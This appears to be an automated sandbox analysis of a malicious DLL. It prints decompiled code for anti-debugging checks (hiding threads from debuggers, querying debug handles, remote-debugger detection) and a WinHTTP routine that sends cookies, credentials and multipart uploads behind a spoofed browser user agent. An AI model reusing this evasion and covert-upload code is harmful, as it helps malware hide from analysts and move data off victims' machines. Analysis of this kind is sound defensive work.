                                                                                                                                                                  • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                                  • API String ID: 3653371871-801751246
                                                                                                                                                                  • Opcode ID: dc2663662de57aa8d86a3c57fad3ddc80e3676cde8346b3d07215fab81a3fbda
                                                                                                                                                                  • Instruction ID: d88cad77f1889e8aed178f934c13fc5a1fcc4ce016c014487da4b3248a857db2
                                                                                                                                                                  • Opcode Fuzzy Hash: dc2663662de57aa8d86a3c57fad3ddc80e3676cde8346b3d07215fab81a3fbda
                                                                                                                                                                  • Instruction Fuzzy Hash: 1FF01C75900208FBEB00DBE08D8DA9CBB78EB04301F514094FB11A6140DA751A48CB55
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E10019FB0() {
                                                                                                                                                                  				void _v8;
                                                                                                                                                                  				_Unknown_base(*)()* _v12;
                                                                                                                                                                  				struct HINSTANCE__* _v16;
                                                                                                                                                                  
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v16 = LoadLibraryA("Ntdll.dll");
                                                                                                                                                                  				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
                                                                                                                                                                  				NtQueryInformationProcess(GetCurrentProcess(), 0x1e,  &_v8, 4, 0);
                                                                                                                                                                  				return 0 | _v8 != 0x00000000;
                                                                                                                                                                  			}







                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019FC2
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019FD4
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 10019FE7
                                                                                                                                                                  • NtQueryInformationProcess.NTDLL(00000000), ref: 10019FEE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
                                                                                                                                                                  • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                                  • API String ID: 3653371871-801751246
                                                                                                                                                                  • Opcode ID: 97d65c81b8affce13ccd6c9ce68ef998821de5ec64206124f7a57a839e50d98e
                                                                                                                                                                  • Instruction ID: aa9a5b676a7025e0056a7a55a28efeedef31c6b5470972081c5102af1e44dd82
                                                                                                                                                                  • Opcode Fuzzy Hash: 97d65c81b8affce13ccd6c9ce68ef998821de5ec64206124f7a57a839e50d98e
                                                                                                                                                                  • Instruction Fuzzy Hash: 35F01C75900208FBEB009BE0CD4DBDCBBB8EB04301F514094EA11A6180DA741A48CB55
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E10019DA0() {
                                                                                                                                                                  				_Unknown_base(*)()* _v8;
                                                                                                                                                                  				struct HINSTANCE__* _v12;
                                                                                                                                                                  
                                                                                                                                                                  				_v12 = LoadLibraryA("Ntdll.dll");
                                                                                                                                                                  				_v8 = GetProcAddress(_v12, "ZwSetInformationThread");
                                                                                                                                                                  				return NtSetInformationThread(GetCurrentThread(), 0x11, 0, 0); // 0x11 = ThreadHideFromDebugger (ThreadInformationClass)
                                                                                                                                                                  			}






                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(Ntdll.dll,?,100207E1), ref: 10019DAB
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,ZwSetInformationThread), ref: 10019DBD
                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 10019DCC
                                                                                                                                                                  • NtSetInformationThread.NTDLL(00000000,?,100207E1), ref: 10019DD3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Thread$AddressCurrentInformationLibraryLoadProc
                                                                                                                                                                  • String ID: Ntdll.dll$ZwSetInformationThread
                                                                                                                                                                  • API String ID: 1707985920-1680533912
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A1D0(CHAR* _a4) {
                                                                                                                                                                  				struct _WIN32_FIND_DATAA _v324;
                                                                                                                                                                  				intOrPtr _v328;
                                                                                                                                                                  				void* _v332;
                                                                                                                                                                  				void* _t11;
                                                                                                                                                                  
                                                                                                                                                                  				_v328 = 0;
                                                                                                                                                                  				_t11 = FindFirstFileA(_a4,  &_v324); // executed
                                                                                                                                                                  				_v332 = _t11;
                                                                                                                                                                  				if(_v332 != 0xffffffff) { // 0xffffffff = INVALID_HANDLE_VALUE
                                                                                                                                                                  					_v328 = _v324.nFileSizeLow;
                                                                                                                                                                  				}
                                                                                                                                                                  				FindClose(_v332); // executed
                                                                                                                                                                  				return _v328;
                                                                                                                                                                  			}








                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileA.KERNELBASE(1001A6D9,?), ref: 1001A1EE
                                                                                                                                                                  • FindClose.KERNELBASE(000000FF), ref: 1001A216
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                                  			E1001A050(void* __ecx) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  
                                                                                                                                                                  				__imp__CheckRemoteDebuggerPresent(GetCurrentProcess(),  &_v8, __ecx); // executed
                                                                                                                                                                  				return _v8;
                                                                                                                                                                  			}





                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000001,?,?,1001A092,?,?,1001A120), ref: 1001A058
                                                                                                                                                                  • CheckRemoteDebuggerPresent.KERNELBASE(00000000,?,?,1001A092,?,?,1001A120), ref: 1001A05F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CheckCurrentDebuggerPresentProcessRemote
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3244773808-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 47%
                                                                                                                                                                  			E10021C30(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a20, signed int _a24, long _a28, long _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				char _v20;
                                                                                                                                                                  				char _v24;
                                                                                                                                                                  				char _v28;
                                                                                                                                                                  				long _v32;
                                                                                                                                                                  				char _v36;
                                                                                                                                                                  				char _v40;
                                                                                                                                                                  				long _v44;
                                                                                                                                                                  				WCHAR* _v48;
                                                                                                                                                                  				long _v52;
                                                                                                                                                                  				short _v54;
                                                                                                                                                                  				short _v58;
                                                                                                                                                                  				short _v62;
                                                                                                                                                                  				short _v66;
                                                                                                                                                                  				short _v70;
                                                                                                                                                                  				char _v72;
                                                                                                                                                                  				long _v76;
                                                                                                                                                                  				long _v80;
                                                                                                                                                                  				intOrPtr _v84;
                                                                                                                                                                  				long _v88;
                                                                                                                                                                  				signed int _v92;
                                                                                                                                                                  				intOrPtr _v96;
                                                                                                                                                                  				intOrPtr _v100;
                                                                                                                                                                  				intOrPtr _v104;
                                                                                                                                                                  				intOrPtr _v108;
                                                                                                                                                                  				char _v112;
                                                                                                                                                                  				signed int _v116;
                                                                                                                                                                  				char _v120;
                                                                                                                                                                  				signed int _v124;
                                                                                                                                                                  				long _v128;
                                                                                                                                                                  				intOrPtr _v132;
                                                                                                                                                                  				intOrPtr _v136;
                                                                                                                                                                  				signed int _v140;
                                                                                                                                                                  				char _v28334;
                                                                                                                                                                  				char _v28336;
                                                                                                                                                                  				intOrPtr _v28340;
                                                                                                                                                                  				intOrPtr _v28344;
                                                                                                                                                                  				char _v28862;
                                                                                                                                                                  				short _v28864;
                                                                                                                                                                  				long _v28868;
                                                                                                                                                                  				long _v28872;
                                                                                                                                                                  				long _v28876;
                                                                                                                                                                  				intOrPtr _v28880;
                                                                                                                                                                  				intOrPtr _v28884;
                                                                                                                                                                  				char _v28912;
                                                                                                                                                                  				char _v28940;
                                                                                                                                                                  				long _v28944;
                                                                                                                                                                  				intOrPtr _v28948;
                                                                                                                                                                  				intOrPtr _v28952;
                                                                                                                                                                  				intOrPtr _v28956;
                                                                                                                                                                  				long _v28960;
                                                                                                                                                                  				intOrPtr _v28964;
                                                                                                                                                                  				intOrPtr _v28968;
                                                                                                                                                                  				intOrPtr _v28972;
                                                                                                                                                                  				intOrPtr _v28976;
                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                  				long _t263;
                                                                                                                                                                  				intOrPtr _t267;
                                                                                                                                                                  				long _t268;
                                                                                                                                                                  				signed int* _t276;
                                                                                                                                                                  				long _t277;
                                                                                                                                                                  				long _t279;
                                                                                                                                                                  				long _t288;
                                                                                                                                                                  				long _t292;
                                                                                                                                                                  				long _t295;
                                                                                                                                                                  				long _t298;
                                                                                                                                                                  				long _t311;
                                                                                                                                                                  				intOrPtr _t330;
                                                                                                                                                                  				intOrPtr _t470;
                                                                                                                                                                  				void* _t471;
                                                                                                                                                                  				void* _t473;
                                                                                                                                                                  				void* _t479;
                                                                                                                                                                  
                                                                                                                                                                  				_t469 = __esi;
                                                                                                                                                                  				_t468 = __edi;
                                                                                                                                                                  				_t357 = __ebx;
                                                                                                                                                                  				_push(0xffffffff);
                                                                                                                                                                  				_push(E10023295);
                                                                                                                                                                  				_push( *[fs:0x0]);
                                                                                                                                                                  				 *[fs:0x0] = _t470;
                                                                                                                                                                  				E10018B00(0x7120);
                                                                                                                                                                  				_v32 = 0;
                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                  				_v36 = 0;
                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                  				_v20 = 0x50;
                                                                                                                                                                  				_v40 = 0;
                                                                                                                                                                  				_t263 = E100212F0(__ebx, __edi, __esi, _a16,  &_v24,  &_v36,  &_v28,  &_v20,  &_v40);
                                                                                                                                                                  				_t471 = _t470 + 0x18;
                                                                                                                                                                  				_v32 = _t263;
                                                                                                                                                                  				if(_v32 == 0) {
                                                                                                                                                                  					L66:
                                                                                                                                                                  					 *[fs:0x0] = _v16;
                                                                                                                                                                  					return _v32;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_v32 = 0;
                                                                                                                                                                  					_v48 = "----WebKitFormBoundaryovEAlxca0DiIz7tl";
                                                                                                                                                                  					_v76 = E1001A3D0(__ebx, __edi, __esi, _v28);
                                                                                                                                                                  					_t267 = E1001A3D0(__ebx, __edi, __esi, _v40);
                                                                                                                                                                  					_t473 = _t471 + 8;
                                                                                                                                                                  					_v84 = _t267;
                                                                                                                                                                  					_v72 = 0;
                                                                                                                                                                  					_v70 = 0;
                                                                                                                                                                  					_v66 = 0;
                                                                                                                                                                  					_v62 = 0;
                                                                                                                                                                  					_v58 = 0;
                                                                                                                                                                  					_v54 = 0;
                                                                                                                                                                  					_t268 = _a20;
                                                                                                                                                                  					_v28944 = _t268;
                                                                                                                                                                  					if(_v28944 == 1) {
                                                                                                                                                                  						_t268 = E1000E7A3(0,  &_v72, 0xa, L"GET");
                                                                                                                                                                  						_t473 = _t473 + 0xc;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						if(_v28944 > 1) {
                                                                                                                                                                  							if(_v28944 <= 3) {
                                                                                                                                                                  								_t268 = E1000E7A3( &_v72,  &_v72, 0xa, L"POST");
                                                                                                                                                                  								_t473 = _t473 + 0xc;
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					_v88 = 0;
                                                                                                                                                                  					_v44 = 0;
                                                                                                                                                                  					_v80 = 0;
                                                                                                                                                                  					_v52 = 0;
                                                                                                                                                                  					__imp__WinHttpOpen(L"A WinHTTP Example Program/1.0", 0, 0, 0, 0); // executed
                                                                                                                                                                  					_v44 = _t268;
                                                                                                                                                                  					if(_v44 == 0) {
                                                                                                                                                                  						L59:
                                                                                                                                                                  						__eflags = _v52;
                                                                                                                                                                  						if(_v52 != 0) {
                                                                                                                                                                  							__imp__WinHttpCloseHandle(_v52);
                                                                                                                                                                  						}
                                                                                                                                                                  						__eflags = _v80;
                                                                                                                                                                  						if(_v80 != 0) {
                                                                                                                                                                  							__imp__WinHttpCloseHandle(_v80);
                                                                                                                                                                  						}
                                                                                                                                                                  						__eflags = _v44;
                                                                                                                                                                  						if(__eflags != 0) {
                                                                                                                                                                  							__imp__WinHttpCloseHandle(_v44);
                                                                                                                                                                  						}
                                                                                                                                                                  						_push(_v84);
                                                                                                                                                                  						E1000CA40(_t357, _t468, _t469, __eflags);
                                                                                                                                                                  						_push(_v76);
                                                                                                                                                                  						E1000CA40(_t357, _t468, _t469, __eflags);
                                                                                                                                                                  						_push(_v36);
                                                                                                                                                                  						E1000CA40(_t357, _t468, _t469, __eflags);
                                                                                                                                                                  						_push(_v28);
                                                                                                                                                                  						E1000CA40(_t357, _t468, _t469, __eflags);
                                                                                                                                                                  						_push(_v40);
                                                                                                                                                                  						E1000CA40(_t357, _t468, _t469, __eflags);
                                                                                                                                                                  						goto L66;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t504 = _a4;
                                                                                                                                                                  					if(_a4 != 0) {
                                                                                                                                                                  						_v100 = E1001A3D0(_t357, _t468, _t469, _a4);
                                                                                                                                                                  						_v112 = 3;
                                                                                                                                                                  						_v108 = _v100;
                                                                                                                                                                  						_v104 = 0x10025f9c;
                                                                                                                                                                  						__imp__WinHttpSetOption(_v44, 0x26,  &_v112, 0xc);
                                                                                                                                                                  						_push(_v100);
                                                                                                                                                                  						E1000CA40(_t357, _t468, _t469, _t504);
                                                                                                                                                                  						_t473 = _t473 + 8;
                                                                                                                                                                  					}
                                                                                                                                                                  					asm("sbb edx, edx");
                                                                                                                                                                  					_v92 =  ~_a24 & 0x00000002;
                                                                                                                                                                  					_t276 =  &_v92;
                                                                                                                                                                  					__imp__WinHttpSetOption(_v44, 0x58, _t276, 4);
					_v96 = _t276;
					_t277 = _v76;
					__imp__WinHttpConnect(_v44, _t277, _v20, 0);
					_v80 = _t277;
					if(_v80 == 0) {
						goto L59;
					}
					_v116 = 0x100;
					if(_v24 != 0) {
						_v116 = _v116 | 0x00800000;
					}
					_t279 = _v80;
					__imp__WinHttpOpenRequest(_t279, &_v72, _v84, L"HTTP/1.1", 0, 0, _v116); // executed
					_v52 = _t279;
					if(_v52 == 0) {
						goto L59;
					} else {
						if(_a8 != 0) {
							_t510 = _a12;
							if(_a12 != 0) {
								_v132 = E1001A3D0(_t357, _t468, _t469, _a8);
								_v136 = E1001A3D0(_t357, _t468, _t469, _a12);
								__imp__WinHttpSetCredentials(_v52, 1, 1, _v132, _v136, 0);
								_push(_v132);
								E1000CA40(_t357, _t468, _t469, _t510);
								_push(_v136);
								E1000CA40(_t357, _t468, _t469, _t510);
								_t473 = _t473 + 0x10;
							}
						}
						_v120 = 4;
						__imp__WinHttpQueryOption(_v52, 0x1f, &_v116, &_v120);
						_v116 = _v116 | 0x00000100;
						_v116 = _v116 | 0x00002000;
						_v116 = _v116 | 0x00001000;
						__imp__WinHttpSetOption(_v52, 0x1f, &_v116, 4);
						__imp__WinHttpAddRequestHeaders(_v52, L"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", 0xffffffff, 0xa0000000);
						__imp__WinHttpAddRequestHeaders(_v52, L"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", 0xffffffff, 0xa0000000);
						__imp__WinHttpAddRequestHeaders(_v52, L"Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7", 0xffffffff, 0xa0000000);
						__imp__WinHttpAddRequestHeaders(_v52, L"upgrade-insecure-requests: 1", 0xffffffff, 0xa0000000);
						if(_a60 == 0) {
							L22:
							__eflags = _a28;
							if(_a28 != 0) {
								_v28340 = E1001A3D0(_t357, _t468, _t469, _a28);
								_v28336 = 0;
								E1000CF80(_t468, &_v28334, 0, 0x6e1e);
								E1000E7A3( &_v28336, &_v28336, 0x3710, L"Cookie: ");
								E1000E729( &_v28336, 0x3710, _v28340);
								__imp__WinHttpAddRequestHeaders(_v52, &_v28336, 0xffffffff, 0xa0000000);
								_push(_v28340);
								E1000CA40(_t357, _t468, _t469, __eflags);
								_t473 = _t473 + 0x2c;
							}
							_v28948 = _a20;
							__eflags = _v28948 - 2;
							if(_v28948 == 2) {
								__imp__WinHttpAddRequestHeaders(_v52, L"Content-Type: application/x-www-form-urlencoded", 0xffffffff, 0xa0000000);
							} else {
								__eflags = _v28948 - 3;
								if(_v28948 == 3) {
									_v28864 = 0;
									E1000CF80(_t468, &_v28862, 0, 0x206);
									_v28344 = E1001A3D0(_t357, _t468, _t469, _v48);
									wsprintfW( &_v28864, L"Content-Type: multipart/form-data; boundary=%ws", _v28344);
									__imp__WinHttpAddRequestHeaders(_v52, &_v28864, 0xffffffff, 0xa0000000);
									_push(_v28344);
									E1000CA40(_t357, _t468, _t469, __eflags);
									_t473 = _t473 + 0x20;
								}
							}
							__imp__WinHttpSetTimeouts(_v52, 0xc350, 0xc350, 0xc350, 0xc350);
							_v128 = 0;
							_v124 = 0;
							__eflags = _a20 - 3;
							if(_a20 == 3) {
								_v124 = E100215A0(_t357, _t468, _v48, _a32, _a36, _a40, _a44, _a48, _a52, _a56, &_v128);
								_v128 = L1000CEAF(_t357, _v48, _t468, _t469, _v124);
								E1000CF80(_t468, _v128, 0, _v124);
								_t330 = E100215A0(_t357, _t468, _v48, _a32, _a36, _a40, _a44, _a48, _a52, _a56, &_v128);
								_t473 = _t473 + 0x58;
								_v124 = _t330;
							}
							__eflags = _a20 - 3;
							if(_a20 != 3) {
								_v28952 = _a36;
							} else {
								_v28952 = _v124;
							}
							__eflags = _a20 - 3;
							if(_a20 != 3) {
								_v28956 = _a36;
							} else {
								_v28956 = _v124;
							}
							__eflags = _a20 - 3;
							if(_a20 != 3) {
								_v28960 = _a32;
							} else {
								_v28960 = _v128;
							}
							_t288 = _v52;
							__imp__WinHttpSendRequest(_t288, 0, 0, _v28960, _v28956, _v28952, 0); // executed
							_v88 = _t288;
							__eflags = _v88;
							if(_v88 == 0) {
								L57:
								__eflags = _v128;
								if(__eflags != 0) {
									_push(_v128);
									E1000CA40(_t357, _t468, _t469, __eflags);
									_t473 = _t473 + 4;
								}
								goto L59;
							} else {
								__imp__WinHttpReceiveResponse(_v52, 0);
								_v88 = _t288;
								__eflags = _v88;
								if(_v88 == 0) {
									goto L57;
								}
								_v28868 = 0;
								__imp__WinHttpQueryHeaders(_v52, 0x16, 0, 0, &_v28868, 0);
								_t292 = GetLastError();
								__eflags = _t292 - 0x7a;
								if(_t292 == 0x7a) {
									_v28884 = L1000CEAF(_t357, &_v28868, _t468, _t469, _v28868 + 2);
									__eflags = _v28868 + 2;
									E1000CF80(_t468, _v28884, 0, _v28868 + 2);
									_t311 = _v52;
									__imp__WinHttpQueryHeaders(_t311, 0x16, 0, _v28884, &_v28868, 0);
									_v88 = _t311;
									_v28880 = E1001A460(_t357, _t468, _t469, _v28884);
									_v28964 = E10001160( &_v28912, __eflags, _v28880);
									_v28968 = _v28964;
									_v8 = 0;
									E10001A90(_a64, _v28968);
									_v8 = 0xffffffff;
									E100011A0( &_v28912);
									_push(_v28880);
									E1000CA40(_t357, _t468, _t469, __eflags);
									_push(_v28884);
									_t292 = E1000CA40(_t357, _t468, _t469, __eflags);
									_t473 = _t473 + 0x1c;
								}
								_v28876 = 0;
								_v28872 = 0;
								__eflags = _v88;
								if(_v88 == 0) {
									L56:
									_v32 = _v88;
									goto L57;
								} else {
									while(1) {
										_v28868 = 0;
										_t437 = _v52;
										__imp__WinHttpQueryDataAvailable(_v52, &_v28868); // executed
										__eflags = _t292;
										if(__eflags == 0) {
											break;
										}
										__eflags = _v28868;
										if(_v28868 != 0) {
											_t295 = L1000CEAF(_t357, _t437, _t468, _t469, _v28868 + 1);
											_t479 = _t473 + 4;
											_v28876 = _t295;
											__eflags = _v28876;
											if(__eflags != 0) {
												E1000CF80(_t468, _v28876, 0, _v28868 + 1);
												_t473 = _t479 + 0xc;
												_t439 = _v28876;
												_t298 = _v52;
												__imp__WinHttpReadData(_t298, _v28876, _v28868, &_v28872);
												__eflags = _t298;
												if(__eflags == 0) {
													_push(GetLastError());
													_push("WinHttpQueryDataAvailable failed. Error = %d\n");
													E1000E664(_t357, _t439, _t468, _t469, __eflags);
													_t473 = _t473 + 8;
												}
												__eflags = _v28872;
												if(__eflags != 0) {
													_v28972 = E10001160( &_v28940, __eflags, _v28876);
                                                                                                                                                                  													_v28976 = _v28972;
                                                                                                                                                                  													_v8 = 1;
                                                                                                                                                                  													E10001A90(_a68, _v28976);
                                                                                                                                                                  													_v8 = 0xffffffff;
                                                                                                                                                                  													E100011A0( &_v28940);
                                                                                                                                                                  													_push(_v28876);
                                                                                                                                                                  													_t292 = E1000CA40(_t357, _t468, _t469, __eflags);
                                                                                                                                                                  													_t473 = _t473 + 4;
                                                                                                                                                                  													__eflags = _v28868;
                                                                                                                                                                  													if(_v28868 > 0) {
                                                                                                                                                                  														continue;
                                                                                                                                                                  													}
                                                                                                                                                                  												} else {
                                                                                                                                                                  												}
                                                                                                                                                                  												goto L56;
                                                                                                                                                                  											}
                                                                                                                                                                  											_push("Out of memory.\n");
                                                                                                                                                                  											E1000E664(_t357, _t437, _t468, _t469, __eflags);
                                                                                                                                                                  											_t473 = _t479 + 4;
                                                                                                                                                                  											goto L56;
                                                                                                                                                                  										}
                                                                                                                                                                  										goto L56;
                                                                                                                                                                  									}
                                                                                                                                                                  									_push(GetLastError());
                                                                                                                                                                  									_push("WinHttpQueryDataAvailable failed. Error = %d\n");
                                                                                                                                                                  									E1000E664(_t357, _t437, _t468, _t469, __eflags);
                                                                                                                                                                  									_t473 = _t473 + 8;
                                                                                                                                                                  									goto L56;
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_v140 = 0;
                                                                                                                                                                  							while( *((intOrPtr*)(_a60 + _v140 * 4)) != 0) {
                                                                                                                                                                  								__imp__WinHttpAddRequestHeaders(_v52,  *((intOrPtr*)(_a60 + _v140 * 4)), 0xffffffff, 0xa0000000);
                                                                                                                                                                  								_v140 = _v140 + 1;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L22;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  			}

                                                                                                                                                                  0x10021fd5
                                                                                                                                                                  0x10021fee
                                                                                                                                                                  0x10022009
                                                                                                                                                                  0x10022023
                                                                                                                                                                  0x1002202f
                                                                                                                                                                  0x10022030
                                                                                                                                                                  0x10022035
                                                                                                                                                                  0x10022035
                                                                                                                                                                  0x1002203b
                                                                                                                                                                  0x10022041
                                                                                                                                                                  0x10022048
                                                                                                                                                                  0x10022068
                                                                                                                                                                  0x1002204a
                                                                                                                                                                  0x1002204a
                                                                                                                                                                  0x10022051
                                                                                                                                                                  0x10022070
                                                                                                                                                                  0x10022087
                                                                                                                                                                  0x1002209b
                                                                                                                                                                  0x100220b4
                                                                                                                                                                  0x100220cf
                                                                                                                                                                  0x100220db
                                                                                                                                                                  0x100220dc
                                                                                                                                                                  0x100220e1
                                                                                                                                                                  0x100220e1
                                                                                                                                                                  0x10022051
                                                                                                                                                                  0x100220fc
                                                                                                                                                                  0x10022102
                                                                                                                                                                  0x10022109
                                                                                                                                                                  0x10022110
                                                                                                                                                                  0x10022114
                                                                                                                                                                  0x10022142
                                                                                                                                                                  0x10022151
                                                                                                                                                                  0x1002215e
                                                                                                                                                                  0x1002218a
                                                                                                                                                                  0x1002218f
                                                                                                                                                                  0x10022192
                                                                                                                                                                  0x10022192
                                                                                                                                                                  0x10022195
                                                                                                                                                                  0x10022199
                                                                                                                                                                  0x100221a9
                                                                                                                                                                  0x1002219b
                                                                                                                                                                  0x1002219e
                                                                                                                                                                  0x1002219e
                                                                                                                                                                  0x100221af
                                                                                                                                                                  0x100221b3
                                                                                                                                                                  0x100221c3
                                                                                                                                                                  0x100221b5
                                                                                                                                                                  0x100221b8
                                                                                                                                                                  0x100221b8
                                                                                                                                                                  0x100221c9
                                                                                                                                                                  0x100221cd
                                                                                                                                                                  0x100221dd
                                                                                                                                                                  0x100221cf
                                                                                                                                                                  0x100221d2
                                                                                                                                                                  0x100221d2
                                                                                                                                                                  0x100221fe
                                                                                                                                                                  0x10022202
                                                                                                                                                                  0x10022208
                                                                                                                                                                  0x1002220b
                                                                                                                                                                  0x1002220f
                                                                                                                                                                  0x10022495
                                                                                                                                                                  0x10022495
                                                                                                                                                                  0x10022499
                                                                                                                                                                  0x1002249e
                                                                                                                                                                  0x1002249f
                                                                                                                                                                  0x100224a4
                                                                                                                                                                  0x100224a4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022215
                                                                                                                                                                  0x1002221b
                                                                                                                                                                  0x10022221
                                                                                                                                                                  0x10022224
                                                                                                                                                                  0x10022228
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1002222e
                                                                                                                                                                  0x1002224b
                                                                                                                                                                  0x10022251
                                                                                                                                                                  0x10022257
                                                                                                                                                                  0x1002225a
                                                                                                                                                                  0x10022272
                                                                                                                                                                  0x1002227e
                                                                                                                                                                  0x1002228b
                                                                                                                                                                  0x100222a7
                                                                                                                                                                  0x100222ab
                                                                                                                                                                  0x100222b1
                                                                                                                                                                  0x100222c3
                                                                                                                                                                  0x100222db
                                                                                                                                                                  0x100222e7
                                                                                                                                                                  0x100222ed
                                                                                                                                                                  0x100222fe
                                                                                                                                                                  0x10022303
                                                                                                                                                                  0x10022310
                                                                                                                                                                  0x1002231b
                                                                                                                                                                  0x1002231c
                                                                                                                                                                  0x1002232a
                                                                                                                                                                  0x1002232b
                                                                                                                                                                  0x10022330
                                                                                                                                                                  0x10022330
                                                                                                                                                                  0x10022333
                                                                                                                                                                  0x1002233d
                                                                                                                                                                  0x10022347
                                                                                                                                                                  0x1002234b
                                                                                                                                                                  0x1002248f
                                                                                                                                                                  0x10022492
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022351
                                                                                                                                                                  0x10022351
                                                                                                                                                                  0x10022351
                                                                                                                                                                  0x10022362
                                                                                                                                                                  0x10022366
                                                                                                                                                                  0x1002236c
                                                                                                                                                                  0x1002236e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022389
                                                                                                                                                                  0x10022390
                                                                                                                                                                  0x100223a1
                                                                                                                                                                  0x100223a6
